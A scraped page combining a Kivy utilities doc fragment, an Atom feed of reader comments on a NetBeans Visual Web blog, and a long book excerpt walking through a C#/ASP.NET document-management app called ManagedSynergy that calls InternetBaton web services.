decorator with an instance variable. It acts like @property, except that the function is only ever called once; after that, the value is cached as a regular attribute. This gives you lazy attribute creation on objects that are meant to be immutable. Taken from the Pyramid project. To use this as a decorator: @reify def lazy(self): ... return hard_to_compute_int first_time = self.lazy # lazy is reify obj, reify.__get__() runs second_time = self.lazy # lazy is hard_to_compute_int - kivy.utils.rgba(s, *args)[source]¶ Return a Kivy color (4 value from 0-1 range) from either a hex string or a list of 0-255 values. New in version 1.10.0. - kivy.utils.strtotuple(s)[source]¶ Convert a tuple string into a tuple with some security checks. Designed to be used with the eval() function: a = (12, 54, 68) b = str(a) # return '(12, 54, 68)' c = strtotuple(b) # return (12, 54, 68)
https://kivy.org/doc/master/api-kivy.utils.html
CC-MAIN-2021-39
refinedweb
580
52.56
Winston Prakash's Weblog (Comments) 2015-09-22T12:30:25+00:00 Apache Roller Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Sadart Abukari 2010-10-23T12:12:51+00:00 2010-10-23T12:12:51+00:00 <p>This is the coolest thing I have ever experienced in Java Visual Web Development. Since I realised that Visual Web is discontinued in NetBeans IDE I have been keeping the 6.0 version like a jewel. I switched to Visual Web in Eclipse (Download link is <a href=")" rel="nofollow">)<.</p> Re: Generic Web Page Designer for Netbeans, anyone? Eclipse 2010-08-10T08:37:44+00:00 2010-08-10T08:37:44+00:00 <p>Use eclipse(for your flavour) + Web Page Editor.</p> Re: Creator Tip: How to create a Collapsible Group Table? ashish 2010-07-26T06:12:54+00:00 2010-07-26T06:12:54+00:00 <p>Hi, Thanks for nice article. Can the second table con be filtered on the person_id that is selected on the first table ?</p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts sahil kaushal 2010-07-13T07:56:48+00:00 2010-07-13T07:56:48+00:00 <p>Thanks for rely. really sad news that vw jsf is no more but I think already enough work had done on it to use it in projects. Thanks once again</p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Pertamax Gan 2010-07-13T06:54:10+00:00 2010-07-13T06:54:10+00:00 <p>it doesn't work for netbeans 6.9</p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Winston Prakash 2010-07-07T07:38:05+00:00 2010-07-07T07:38:05+00:00 <p>Unfortunately that is true. Visual Web is no longer continued. The best alternative is Fusion Application Development using JDeveloper (<a href=")" rel="nofollow">)</a></p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts sahil kaushal 2010-07-07T02:06:12+00:00 2010-07-07T02:06:12+00:00 <p>hi Winston Prakash I always appreciated your work on visual web jsf and learned a lot from your blog regarding this. IS visual web jsf development really dead what are the reason for this what is best alternate . </p> Re: Creator tip: How to create a table component dynamically Gayani Champika 2010-06-03T00:07:15+00:00 2010-06-03T00:07:15+00:00 <p>I am Using Sun Java Studio Creator 2 with Oracle Database.When Executing findFirst method I am getting error ("Statement not executed : getMetaData()")Example Code : <br/> String cmd = "select \* from USERTB";</p> <p> getSessionBean1().getUsertbRowSet().setCommand(cmd);<br/> getSessionBean1().getUsertbRowSet().execute();<br/> usertbDataProvider.setCachedRowSet(getSessionBean1().getUsertbRowSet());<br/> usertbDataProvider.refresh();<br/> RowKey rowkey = usertbDataProvider.findFirst(<br/> new String[] {"userid","password"},<br/> new Object[] {"gayanitest","gayani"}<br/> );</p> <p>This code is perfectly running with Infomix database. But with Oracle 10g it is giving error. </p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Jose 2010-02-19T02:58:16+00:00 2010-02-19T02:58:16+00:00 <p>Hi all!<br/> Probably many of you knows that VisualWeb was 'deleted' in the new Netbeans 6.8 and it is not possible to install any PlugIn as this one.<br/> This is a big step backwards from SUN (now Oracle) specially for all developers that use this functionality.<br/> Officially the small explanation is the Visual frame work is unstable but of course there are other reasons. Probably a concurrent software in Oracle products or something else.<br/> Does anyone knows exactly what happened ?</p> <p>Regards<br/> Jose </p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Imos 2010-02-03T05:48:42+00:00 2010-02-03T05:48:42+00:00 <p>It doesn't work for Netbeans 6.8</p> Re: Generic Web Page Designer for Netbeans, anyone? Sathish Kannath 2010-01-18T03:16:29+00:00 2010-01-18T03:16:29+00:00 <p>@above<br/> Netbeans 6.8 already supports embedded browser plugin.. great code coverage, content assist already there.. A visual designer would be icing on the cake.. not mandatory, since netbeans is now a coder's dream IDE</p> Re: Creator Tip: How to create single selectable row Table component denim98 2010-01-12T17:49:53+00:00 2010-01-12T17:49:53+00:00 <p>I am using NB6.7.1 . I have nullpointer exception too when i try to have more than one dataprovider for each jsp page. When i delete all other dataprovider, the sole data provider works fine. I repeated this with other dataprovider i.e. using only single dataprovider per page, they work fine too.</p> <p>I did not have this problem when using NB 6.7.0. I was able to access multiple dataproviders in a single page.</p> <p>Anyone else having this issue?</p> Re: Creator Tip: Setting table column or row style sudoku solver 2010-01-10T00:07:12+00:00 2010-01-10T00:07:12+00:00 <p>yes thanks very much winston as well excellent tips</p> Re: Generic Web Page Designer for Netbeans, anyone? Aakash 2009-12-16T23:43:48+00:00 2009-12-16T23:43:48+00:00 </p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Rao 2009-12-03T15:35:30+00:00 2009-12-03T15:35:30+00:00 <p>Hi,</p> <p>I am using Netbeans 6.7.1 with jre 1.6.x. I have installed the Visual Web Page Layouts plugin. As Lorenzo reported , I am not seeing the Pagelayout panel. Please help me what I am doing wrong</p> Re: Generic Web Page Designer for Netbeans, anyone? Ravikiran 2009-11-28T03:45:36+00:00 2009-11-28T03:45:36+00:00 <p>Hello Sir,</p> <p>This is what I am looking. Because HTML page is nothing but a normal which u can design as you want. So this drag-drop facility will be really helpful for new learners like me. This one is simpler than using Microsoft Word for creating document.</p> <p>Thank You<br/> Best Regards.</p> Re: Generic Web Page Designer for Netbeans, anyone? Andy 2009-11-20T02:07:06+00:00 2009-11-20T02:07:06+00:00 <p>I stand corrected Winston is back! hey Winston any plans on this :-) </p> Re: Generic Web Page Designer for Netbeans, anyone? Andy 2009-11-20T02:03:04+00:00 2009-11-20T02:03:04+00:00 ?</p> Re: Generic Web Page Designer for Netbeans, anyone? Waqas 2009-11-19T22:58:58+00:00 2009-11-19T22:58:58+00:00 <p>Yeah, it's really cool. And this will definitely make NetBeans the best IDE ever. We are really waiting for such a cool development.</p> <p>waiting....<br/> waiting....<br/> waiting....</p> <p>Well, let's see how long we have to wait..........</p> Re: Generic Web Page Designer for Netbeans, anyone? Billy Draper 2009-11-04T12:57:44+00:00 2009-11-04T12:57:44+00:00 <p>This is not a waste of time! This is a NEED for Netbeans. I believe it will definitely complement the tool set and allow the developers to be more efficient as they will only deal with one tool.</p> Re: Creating a Multi-Row Selectable CheckBox Table sam mills 2009-11-04T03:45:51+00:00 2009-11-04T03:45:51+00:00 <p>hi winston .....my boss will surely kill me if i dont complete the following task in two days...i have been searching fo 10 days and try every logic that i can....please help me....<br/> Problem is:when the user comes for update...table rows already checked corresponding to database values....for instance;database table A has values'1,3,5' in the field code then on update screen row no 2,row#3 and row #5 must be checked i wrote the code in prerender and set checkbox1.setselected(BigDecimal(1))..bt no use then i changed it into "int 1"...then true...bt still haven't completed the task,none of the row is checked when page is displayed.</p> <p>and one more thing table is visible or invisivle on a dropdown values</p> <p>plz help...i would be really obliged.........</p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Gabriel Mendez 2009-11-02T14:55:07+00:00 2009-11-02T14:55:07+00:00 <p>This is really amazing, I didn't know something like this had been created, I'm pretty new in Java Web but this make me continue learning and developing... Just great!</p> Re: NB 6.0 Visual Web Table Component Binding Enhancements To Use POJOs chandu 2009-10-28T04:28:38+00:00 2009-10-28T04:28:38+00:00 <p>Hi Winston,<br/> I am using NB6.1 ,By changing the static text to text field in table layout we can edit the data in to jsf table.But how<br/> can we update the whole columns we edited, Into database.</p> Re: Generic Web Page Designer for Netbeans, anyone? Gerry Polk 2009-10-23T07:18:21+00:00 2009-10-23T07:18:21+00:00 <p>Fantastic idea. Something I've wanted to see for a long time.</p> Re: NB 6.0 plugin for Predefined Visual Web Page Layouts Outsource websites 2009-10-10T02:34:42+00:00 2009-10-10T02:34:42+00:00 <p>These templates are really great for low cost webdesigning and in order to outsource websites.</p> Re: Creating Netbeans 6.0 Visual Web Components Custom Theme Using Theme Builder kashani 2009-10-07T03:01:57+00:00 2009-10-07T03:01:57+00:00 <p>hello<br/> i hope you will be fineand happy.<br/> when i build them error:<br/> ___________________________________<br/> Created dir: C:\\JavaAjax\\Theme\\build<br/> Copying 459 files to C:\\JavaAjax\\Theme\\build<br/> Copying 2 files to C:\\JavaAjax\\Theme\\build\\META-INF<br/> Compiling 1 source file to C:\\JavaAjax\\Theme\\build<br/> C:\\JavaAjax\\Theme\\src\\theme\\ThemeServiceImpl.java:24: package com.sun.webui.theme does not exist<br/> import com.sun.webui.theme.ThemeService;<br/> C:\\JavaAjax\\Theme\\src\\theme\\ThemeServiceImpl.java:26: cannot find symbol<br/> symbol: class ThemeService<br/> public class ThemeServiceImpl extends ThemeService {<br/> 2 errors<br/> C:\\JavaAjax\\Theme\\nbproject\\build-impl.xml:83: Compile failed; see the compiler error output for details.<br/> BUILD FAILED (total time: 2 seconds)</p> <p>___________________________________</p> Re: Netbeans VWP tip: A simple idea to load test your web application response kashani 2009-10-07T01:13:38+00:00 2009-10-07T01:13:38+00:00 <p>hello<br/> please help me<br/> when i added dojo/fisheye in visual web netbeans project and herf:'/page2.jsp' then error on select image:<br/> _____________________________________________________________________<br/> HTTP Status 404 -</p> <p>type Status report</p> <p>message</p> <p>descriptionThe requested resource () is not available.<br/> Sun Java System Application Server 9.1_02<br/> ______________________________________________________</p> <p>please help me how to fix this error.<br/> thanx for all</p> Re: Creator Tip: How to create single selectable row Table component Grenadadoc 2009-09-20T17:36:03+00:00 2009-09-20T17:36:03+00:00 <p>I followed your code exactly (except for my specific variable names). I have a problem w/ the IDE not being able to find the getTableRowGroup1() methods. I have used the following imports w/o success: import com.sun.webui.jsf.component.Table, ...TableColumn, and ...TableRowGroup.</p> <p>Error message (from the NetBeans 6.7.1 IDE): <br/> cannot find symbol <br/> symbol: method getTableRowGroup1()<br/> location: class.trial3v1.page1</p> <p>Any ideas?</p> Re: Creating Netbeans 6.0 Visual Web Components Custom Theme Using Theme Builder vishwa 2009-09-02T06:47:48+00:00 2009-09-02T06:47:48+00:00 <p>hi </p> <p/> F:\\Work\\j2me\\Test4\\nbproject\\build-impl.xml:560: Deployment error:<br/>/> See the server log for details.</p> Re: Netbeans tip: Creating an AJAX enabled custom JSF component - Part 2 guest 2009-08-06T06:19:05+00:00 2009-08-06T06:19:05+00:00 <p>good</p>
https://blogs.oracle.com/winston/feed/comments/atom
CC-MAIN-2015-40
refinedweb
2,068
59.09
Applied C# - ManagedSynergy - Conclusion Chapter 3 discussed the merits of C# and gave a tour of the language that included small coding examples to explain specific language details. This chapter has a broader focus and shows you how all those isolated language constructs can be woven together to produce the new and exciting class of software we call people-oriented software. We have chosen an example application that demonstrates what is likely to be a very common development scenarioan application is built to seamlessly integrate with complementary Web services of another application. In keeping with the spirit of our book's title, Applied .NET, the following list highlights a variety of different aspects of .NET development that are demonstrated in this chapter: Producing a Web service Invoking a Web service Using server-side controls and events Implementing field validation using active server page (ASP) .NET validation controls Implementing an ASP.NET custom control Performing object serialization over the Internet Using various common language runtime (CLR) classes Applying .NET exception handling ManagedSynergy In Chapter 2, we introduced the InternetBaton application, which allows people to collaborate on a shared resource in a decentralized fashion over the Internet. In this chapter, we create a new application called ManagedSynergy that makes use of the services provided by InternetBaton to create a decentralized document management system. The Vision ManagedSynergy is an application that combines document management features such as approval workflow with the distributed project folder capabilities of InternetBaton. The result is a document management system that does not require a centralized document server. This approach would be ideal for collaborative projects in which funds are tight and the participants have no real organizational relationship (which makes it tough to find shared servers to use). Charity work and certain Internet development projects are good examples in which this model would work well. In both cases the work being done is a labor of love but nonetheless needs to be done right with document management. The ultimate goal of this application is to provide an inexpensive means for people to practice managed collaboration in hopes that the end result is greater than the sum of the individual efforts. The Functionality The core concept in ManagedSynergy is the notion of a shared project file, which, not surprisingly, contains project items, each of which represents a shared InternetBaton resource. The focus of the application centers on manipulating the project file. Using ManagedSynergy, you can add and delete project items, check items in and out, view an item and its properties, and review an author's changes and either approve them or request that revisions be made. Checking an item out means that other authors participating in the shared project are not allowed to modify the item until it is checked back in. This is more a change management feature than it is version control because there is no notion of version history in this application. Here is how it all works. When an author wants to make a change to the content of a project item, the first step is to check the item out so that others know it is being worked on. At this point, displaying the properties for that item would show that its revision status is checked out and its approval status is in revision. The author makes whatever modifications are needed and checks the item back in. At this point the revision status changes to checked in and the approval status (assuming that the review feature was enabled for this project) changes to in review. Each reviewer can look over the changes that were made and submit a brief review along with an indication of whether the changes were approved or further revisions are necessary. When all the reviewers have finished reviewing the changes, the approval status changes to either approved or revise depending on the verdict of each of the reviews. The changes are considered approved if all the reviewers agree to approve them; otherwise, the changes are rejected and revisions are required. To make things simple, all reviews are cleared each time changes are checked back in. ManagedSynergy does not have its own administration facilities. Instead it uses those provided by InternetBaton. When project administrators want to set up a new shared project, they select the ManagedSynergy administration option, which takes them to the InternetBaton application where the project can be set up and participants can be identified. Once the project is set up, the users are no longer aware that they are using InternetBaton because its exposed Web services are programmatically accessed to seamlessly integrate the two applications. That is, when an item is added to the ManagedSynergy, it is also added behind the scenes to InternetBaton. The same holds true for checking out an itemit is reflected in both applications. When ManagedSynergy's view option is selected, the browser simply points to the Internet-Baton link, and the shared item is displayed. Things are a little different when an item is reviewed. InternetBaton does not have the concept of reviewing items or establishing an approval process. This functionality resides solely in ManagedSynergy, and it is the added value this application brings to the table. In essence, what this application has done is to seamlessly extend the project file supported by InternetBaton and other than the administration angle, the user is truly unaware of which features ManagedSynergy provides and which features are provided by InternetBaton. An interesting aspect of this application is that integration with InternetBaton is not just one way. ManagedSynergy operates in a multiuser environment in which several project participants may be working on their project items concurrently. Therefore it is necessary for project status to be dynamically updated as it changes. Because all project-related activity is mirrored to this Web service, InternetBaton becomes a natural choice for the central location from which to replicate out project changes to the other active project participants. This means that in addition to consuming Web services, ManagedSynergy will also expose Web services so that InternetBaton can call them to cause replication to occur. Another useful feature made possible as a result of exposing Web services is a synchronization feature that allows quite large files to be automatically updated overnight. The Design Chapter 2 introduced the concept of People-Types and how they could be used to help focus a developer's attention in the areas that are most important for people-oriented software. We continue with that approach in this chapter as we examine how the ManagedSynergy application addresses the primary forces that shape people-oriented software: universalization, collaboration, and translation. Because the process of using people-types involves stepping back and taking a look at how these forces factor into the design of an application, it may be helpful to first provide a concise list of this application's features. Universalization Now that we know what features the ManagedSynergy application provides, we can discuss those aspects of the design that resulted from taking a "miner's" perspective and determining how much of the functionality could be achieved through universalization. Universalization is ultimately concerned with identifying what existing resources can be utilized and applied in the design and implementation of an application. We consider the features in Table 4-1 one at a time to understand how all this worked. Table 4-1 Features of ManagedSynergy When we looked into the issue of a shared project file, we discovered that what was needed was the ability to save the current state of the project to disk. Further, we decided that if we could get the object that held the project data to serialize itself, we could have it write itself to disk and then later read itself back in with very little effort on our part. (In this context, laziness is a good thing.) Our miner-focused investigation determined that all this could be accomplished using .NET serialization. Another interesting wrinkle related to object serialization was the fact that the project file itself needed to be a Baton item just like project items. Taking this approach, the project file could be easily shared between the participants. It would also ensure that the contents would always be accurate (because everyone would point to the same project files no matter where the current version was). Given this requirement, being able to serialize the project file over the Internet became a very desirable option and as it turned out, the CLR classes directly supported serialization over the Internet as well. We discuss serialization when we expand on ManagedSynergy's implementation later in this chapter. When we thought about the issue of checking project items in and out, we found that one of the things that was needed was field validation. During the process of checking an item back in, the author needs to fill out a form that includes a check-in comment for others to refer to before they conduct their review. Because this comment is so important, ensuring that it was filled out became a requirement. Service-side controls provided field validationjust what the doctor ordered. As we thought about the other forms involved in the application, field validation was applicable in those instances as well, so once again our miner's perspective paid off. Also in the area of forms management there was the desire to manage form control events in a familiar manner. ASP .NET and Visual Studio offer an event model that most programmers have already become accustomed to in Visual Basic and C++, so selecting this approach was an easy choice. In terms of document publication, we had to make the movement of files from working directories to public directories automatic so that the users would not have to keep track of the details and to ensure that the copy took place when it should. It is not until the project items are copies to this public location (along with some necessary Baton collaboration) that they are visible to other participants. As it turns out, offline document replication had very similar requirements to those of document publication in that files need to be copied from one place to another. Using the CLR's File and Directory classes made designing and implementing both of these application features a snap. Throughout the design and implementation, we constantly had to deal with the unexpected. How would we deal with things not working because of external factors such as a full disk or a lack of proper file permissions? Our miner's perspective resulted in adopting .NET exception handling. (Okay. It was not that noteworthy or courageous a decision, but it was a decision born out of a miner's spirit and so I mention it here). Using this type of exception handling, we will even be able to receive exceptions thrown by the InternetBaton Web service, yet another application that we are calling over the Internet! Collaboration Collaboration affects how your application interacts with other applications and services to accomplish its goals. Continuing with the technique we learned in Chapter 2, we adopted a "conductor" perspective to help focus our attention on collaborative aspects of the application. In ManagedSynergy, collaboration is required to accomplish a seamless integration of InternetBaton functionality as well as support dynamic project status updates and offline document replication. Integrating with InternetBaton involves calling its Web services to add, delete, view, check in, or check out project items. Each of these actions has an effect on the shared state of the project file as well as an effect on the state held in the InternetBaton application. For most of these actions, the general order of events is as follows: Deserialize the contents of that project file (just in case it changed since we started our session). Apply the intended action (e.g., add, delete) to the project object. Save the project object to disk using serialization, and copy the project file to its shared location. Forward the action to InternetBaton, if appropriate. Check back in the project file, thus making the change public. In the scenario just described, ManagedSynergy takes an active role in the integration of the two applications. In contrast, implementing dynamic project status updates and offline document replication involves a passive approach (with respect to ManagedSynergy) in which the ManagedSynergy application itself is used as a Web service by the InternetBaton application. When a project item is checked in or out, the resulting status changes are sent to each of the participant's Web servers. Any participant who is currently using the application is dynamically notified of the change. Similarly, when InternetBaton has been instructed to perform offline document replication and it is time to perform the task, each participant's Web service is invoked and instructed to update the contents of each of the project items. The new Web services capability provided by the .NET platform makes this kind of synergy very straightforward. Thinking about software as services has several positive implications and is something that will be one of the more important technologies being developed. Translation Translation is all about how identical concepts that may be dissimilar in form can be used in a heterogeneous environment. The translation story for ManagedSynergy is limited to the use of Web services. Web services in .NET are implemented using Simple Object Access Protocol (SOAP) technology; therefore any client that can speak SOAP can be a client of this application. InternetBaton could be ported to another operating system and the dynamic status notification would still work, as would the offline replication and the remaining interactions between the two applications. The point is that Web services allow clients to translate a SOAP request into a correct response no matter what kind of implementation was chosen for that client. This perspective shows that translation is of no small consequence. The Implementation Although this application's complexity is not on par with the software that launches the space shuttle, there is a reasonable amount of functionality in the ManagedSynergy application. What is surprising is that using .NET and our people-oriented techniques makes this implementation a rather simple one. In Chapter 3 we presented .NET as a revolution that elevates application development to a radically simpler level of implementation. Reviewing this application implementation should lend credibility to that statement. Developing in .NET is a pleasure, and your intuition about how things should operate is exactly how they do operate. Before we get into the details of the implementation, we are going to discuss the application's main screen. Figure 4-1 is a screen shot of the Project.aspx page, the page on which the users spend the bulk of their time. Listed in the action bar are the various steps we outlined earlier in this chapter. Each of these actions originates from this page and returns back to it once completed. On the left-hand side of the page is the project item list (in this case, the chapters of a book that is being collaboratively developed). To the right of the project item list are the property details of selected items (in this case, Chapter 2.doc). Figure 4-1 Project Page (Main Screen) for ManagedSynergy. Probably the easiest way to examine this implementation is to describe a scenario that weaves through all the various actions that could be taken by a user. This will give us a basis for discussion as well as provide complete coverage of the various aspects of the implementation that need to be examined. The following list describes the various scenarios and the order in which we will cover each one: - Opening an existing project - Creating a new project - Adding a project item - Deleting a project item - Checking out an item - Viewing a project item - Checking in an item - Reviewing an item - Viewing an item's properties - Invoking administration services Opening an Existing Project We begin by discussing the steps involved in logging a user in to the application. Figure 4-2 shows the Start.aspx page, which users complete so that they can log in. The user ID is an e-mail address, and the project uniform resource locater (URL) must be linked to an InternetBaton resource that identifies the project file. If the project file does not exist, then users are alerted and asked if they want to create a new project file. Figure 4-2 Start Page for ManagedSynergy. We mentioned previously that server-side controls and field validation played a role in this implementation. The ASP .NET code for this page shows an example of both. Because all the other ASP .NET pages in this application involve the very same processes, we only need to discuss one example to explain how the presentation of this works. As pointed out in Chapter 2, ASP .NET introduces a way to cleanly separate the presentation code from the "code behind" the form. Therefore every form you see in this application has a presentation file (identified by an .aspx extension) and a "code-behind" file (identified by a .cs extension). We use the term code behind because this is how the relationship between the two files is specified in the hypertext markup language (HTML) file. The following only includes the relevant portion of Start.aspx that shows server-side controls and field validation in action. (The complete source for this entire application can be found on this book's Web site.) <asp:TextBox id=m_UserTB</asp:TextBox> <asp:TextBox id=m_ProjectUrlTB</asp:TextBox> <asp:Button id=m_OpenProjectButton</asp:Button> <asp:requiredfieldvalidator id=m_UserValidator <asp:requiredfieldvalidator id=m_ProjectFileValidator <asp:validationsummary id=m_StartPageValidSummary This listing shows an example of the <asp:TextBox> and <asp:Button> server-side controls. The first text box control is for the user ID, and the second one is for the project URL. The id attribute specifies the name of the member variable that represents these controls in the code behind this form. Not surprisingly, the <asp:button> control is the Open Project button. Each of the text boxes has its own <asp: requiredfieldvalidator>, which is the field validation control. (See Chapter 2 for a full explanation of validation controls.) Now we can discuss the code behind this form. The following is code from the Start.cs file, which was specified as this form's Codebehind attribute. namespace ManagedSynergy { using System; using System.IO;; public class Start : System.Web.UI.Page {; public Start() { Page.Init += new System.EventHandler(Page_Init); } protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) { // // Evals true first time browser hits the page // } }_OpenProjectButton.Click += new System.EventHandler (this.OpenProjectButton_Click); this.Load += new System.EventHandler (this.Page_Load); } public void OpenProjectButton_Click (object sender, System.EventArgs e) { // Save the user ID in the Application object for use later Page.Application.Contents["User"] = m_UserTB.Text; Page.Application.Contents["ProjectUrl"] = m_ProjectUrlTB.Text; // Create a baton object so we can access the InternetBaton // Web service ManagedSynergy.localhost.Baton Baton = new ManagedSynergy.localhost.Baton(); // A Baton query for the existence of the project specified in // the m_ProjectUrlTB field if (Baton.ProjectExists(m_UserTB.Text, Project.UrlToName(m_ProjectUrlTB.Text))) { try { // Create a project object that points to the shared // project file. Project Proj = new Project(); // Load data from the shared project file ProjectUrl Project.Load(ref Proj, m_UserTB.Text, m_ProjectUrlTB.Text); // Make project data available to other pages Page.Application.Contents["Project"] = Proj; // Point browser to project page Response.Redirect("ProjectPage.aspx"); } catch (System.Runtime.Serialization.SerializationException) { m_ExceptionMsg.Text = "Could not load project file. The Baton server may be down or the project file may be corrupt or an incompatible format."; } } else { // Project does not exist so let's see if the user wants to create // a new one Response.Redirect("ConfirmCreate.aspx?ProjectUrl=" + m_ProjectUrlTB.Text); } } } } As with the previous presentation code, we will not take the time to explain every aspect of this listing. Instead we highlight those sections that show .NET in action, as well as those aspects that are necessary for understanding the rest of the application. The first thing that you should note is the control member declarations:; Each of these corresponds to the IDs that were specified in the previous presentation code. If you are using Visual Studio.NET, then members are automatically added to your code-behind class. If you skip down to the InitializeComponent() class, you can see how the event handling is specified in .NET. There is only one event in which we are interested in this form, so the code ends up looking like the listing that follows. The control m_OpenProjectButton has its event handler set in the OpenProjectButton_Click() method: private void InitializeComponent() { m_OpenProjectButton.Click += new System.EventHandler (this.OpenProjectButton_Click); this.Load += new System.EventHandler (this.Page_Load); } The last thing to discuss in this file is the OpenProjectButton_Click() method itself. Clicking the Open Project button on the start page invokes this method. The first thing this code does is save the user's ID and the project URL in the application object: // Save the user ID in the Application object for use later Page.Application.Contents["User"] = m_UserTB.Text; Page.Application.Contents["ProjectUrl"] = m_ProjectUrlTB.Text; The application object operates just as it did in ASP, and assigning it values makes the values available to other pages in the application. We use the application object rather than the session object because we need to get at these values in the Web service code, which has a different session instance. The code behind the various forms in this application also makes use of the values stored in the application object. Next we use the InternetBaton Web service to determine whether this project already exists: // A Baton query for the existence of the project specified in // the m_ProjectUrlTB field if (Baton.ProjectExists(m_UserTB.Text, Project.UrlToName(m_ProjectUrlTB.Text))) If the project does not exist, we ask the users if they want to create a project. If the project does exist, then we load the project over the Internet using InternetBaton to get the most up-to-date project file: // Load data from the shared project file ProjectUrl Project.Load(ref Proj, m_UserTB.Text, m_ProjectUrlTB.Text); // Make project data available to other pages Page.Application.Contents["Project"] = Proj; // Point browser to project page Response.Redirect("ProjectPage.aspx"); After loading the project, we again use the application object to save a reference to the project object, which now holds all the most current project data. Finally, we use the ASP .NET response object to point the browser to the main application page we showed previously. While we are here, we can take a look at the code that loaded the project data from an InternetBaton resource accessed over the Internet. The Load() method is a member of the project class that is located in the Project.cs file. The project class and the other classes in this file encapsulate and abstract the notion of a ManagedSynergy project. This allows the code behind the forms in this application and the methods that are used as Web services to cleanly call project-related primitives. Without these classes, the implementation of a project would be spread around various places in the application, and the methods of these classes would have to be redundantly coded "in-line" every time the functionality was needed. With the encapsulated approach the code is centralized, so fixing an error only requires the user to make a change in one place rather than search the application looking for the various other places that might also need to be changed. As we discuss this implementation, keep in mind that architecturally the forms and the Web service exist for the purpose of connecting clients to the functionality encapsulated in the project classes. Turning our attention to the Project.Load() method, you will notice that we used a static method for this code. We chose to use a static method because we had a chicken-or-egg type of problem; it seemed safer to pass in the object rather than assign the deserialized object to the this reference. That is, the alternative would have involved invoking the Load() method on an object instance, and inside that method we would have needed to point the this reference to the new object. public static void Load(ref Project Project, string UserName, string ProjectUrl) { // Create a Web-based stream gives access to the project file // over the Internet WebRequest Request = WebRequest.Create("http://<IB>" + Project.UrlToName(ProjectUrl)); Stream ProjStream = Request.GetResponse().GetResponseStream(); try { // Create the formatter BinaryFormatter ProjFormatter = new BinaryFormatter(); // Load the project file from the Web-based stream. This always // causes the most current project file to be loaded. Project = (Project) ProjFormatter.Deserialize(ProjStream); } finally { ProjStream.Close(); } } The WebRequest class shown here is provided by the .NET framework. This class can be used to treat a uniform resource identifier (URI) as a stream, which is exactly what the BinaryFormatter requires for deserialization. Once the stream is established, the binary formatter can be used to deserialize the Project object and assign the resulting value to the reference argument that was passed to the method. This code is a good example of the power and simplicity of the .NET framework. Creating a New Project When creating a new project, we assume that the project URL specified by the user points to a project file that does not yet exist. We want to ask users whether they want to create a new project. (Who knows? They may have mistyped the URL and do not intend to create a new project.) If the users decide to create a new project, their browser will point to the CreateProject.aspx page shown in Figure 4-3. Figure 4-3 Create Project Page for ManagedSynergy. Although we said previously that each page is so similar we only need to examine the startup page, there is one detail in this presentation code worth revisiting. This page makes use of the <asp:regularexpressionvalidator> regular expression field validator. The following is how this is defined in CreateProject.aspx: <asp:regularexpressionvalidator id=m_DigitNumOfReviewersValidator The regular expression validator ensures that the characters entered in a field on a form match a pattern (i.e., the regular expression). We used this validation control to make sure that the value for the number of reviewers is a numeric value. We already discussed each of the attributes used in this definition, and the ones shown here have the same meaning. What is new here is the validationexpression attribute. This attribute defines the regular expression that should be used to validate the field. We specified the regular expression "[0-9]*", which says that the input must be zero or more digits and nothing else. Because you can set more than one validator on a given field, we were able to add an <asp:requiredfieldvalidator> for the same field to catch a case in which nothing at all is entered in the field (which would have been valid if we had used <asp:regularexpressionvalidator> only). The following is the code behind this page. Many of the standard steps are repeated in this listing: namespace ManagedSynergy { using System; using System.Collections; using System.ComponentModel; using System.Data; using System.Drawing; using System.Web; using System.Web.SessionState; using System.Web.UI; using System.Web.UI.WebControls; using System.Web.UI.HtmlControls; public class CreateProject : System.Web.UI.Page { protected System.Web.UI.WebControls.Label m_ExceptionMessage; protected System.Web.UI.WebControls.ValidationSummary m_CreateProjectValidSummary; protected System.Web.UI.WebControls.RegularExpressionValidator m_DigitNumOfReviewersValidator; protected System.Web.UI.WebControls.RequiredFieldValidator m_RequiredNumOfReviewersValidator; protected System.Web.UI.WebControls.RequiredFieldValidator m_AdminEmailValidator; protected System.Web.UI.WebControls.RequiredFieldValidator m_AdminNameValidator; protected System.Web.UI.WebControls.Button m_CreateButton; protected System.Web.UI.WebControls.TextBox m_NumOfReviewersTB; protected System.Web.UI.WebControls.TextBox m_AdminEmailTB; protected System.Web.UI.WebControls.TextBox m_AdminNameTB; protected System.Web.UI.WebControls.Label m_ProjectLabel; private static string s_ProjectUrl; public CreateProject() { Page.Init += new System.EventHandler(Page_Init); } protected void Page_Load(object sender, EventArgs e) {_CreateButton.Click += new System.EventHandler (this.CreateButton_Click); this.Load += new System.EventHandler (this.Page_Load); } public void CreateButton_Click (object sender, System.EventArgs arg) { Project Proj; string UserID = (string)Page.Application.Contents["User"]; string ProjectUrl = (string)Page.Application.Contents["ProjectUrl"]; try { Proj = new Project(UserID, ProjectUrl, Page.MapPath("Projects"), m_AdminNameTB.Text, m_AdminEmailTB.Text, Convert.ToInt32(m_NumOfReviewersTB.Text)); // Store project in Application object for other pages to use Page.Application.Contents["Project"] = Proj; // Add the newly create project file to InternetBaton Proj.AddProjectToBaton(); // Point the browser to the project page Response.Redirect("ProjectPage.aspx"); } catch (Exception e) { m_ExceptionMessage.Text = "Error: \"" + e + "\\"; } } } } There are a lot more server-side controls in this code than there were in the previous page but other than that there is nothing new. There is, however, something new in the implementation of the Page_Load() method. Previously, we did not have any work that needed to be done in this framework method, which gets invoked every time the page is loaded. The code in the following conditional, on the other hand, is only executed the first time the browser hits this page: desired } The first two lines of code set the label in the page's display heading, and the second two set default values for the form fields. This brings us to CreateButton_Click(), which is the last method in this file and the method that is invoked when the Create button is clicked. The first two methods get the values that we saved in the application object when the user first logged in to the application. The remaining code in this method (the code inside the try block) creates a new project object by passing on its initial values, adds a link to the newly created project to InternetBaton, and finally, points the browser to the ProjectPage.aspx so that the user can start adding items. We discuss the exception handling itself when we take a look at adding items to the project. As we did previously, let's take a look at another Project method before we move on. The purpose of the AddProjectToBaton() method is to add a link that points this newly created project file to InernetBaton. When we thought about the design of the ManagedSynergy application, our focus was on adding some approval workflow to document revision. Using InternetBaton was a logical choice for sharing the user's document, and on top of that we would add the approval workflow. Then we had to figure out how to share the ManagedSynergy project file itself, which is when we came up with the idea that we could use an 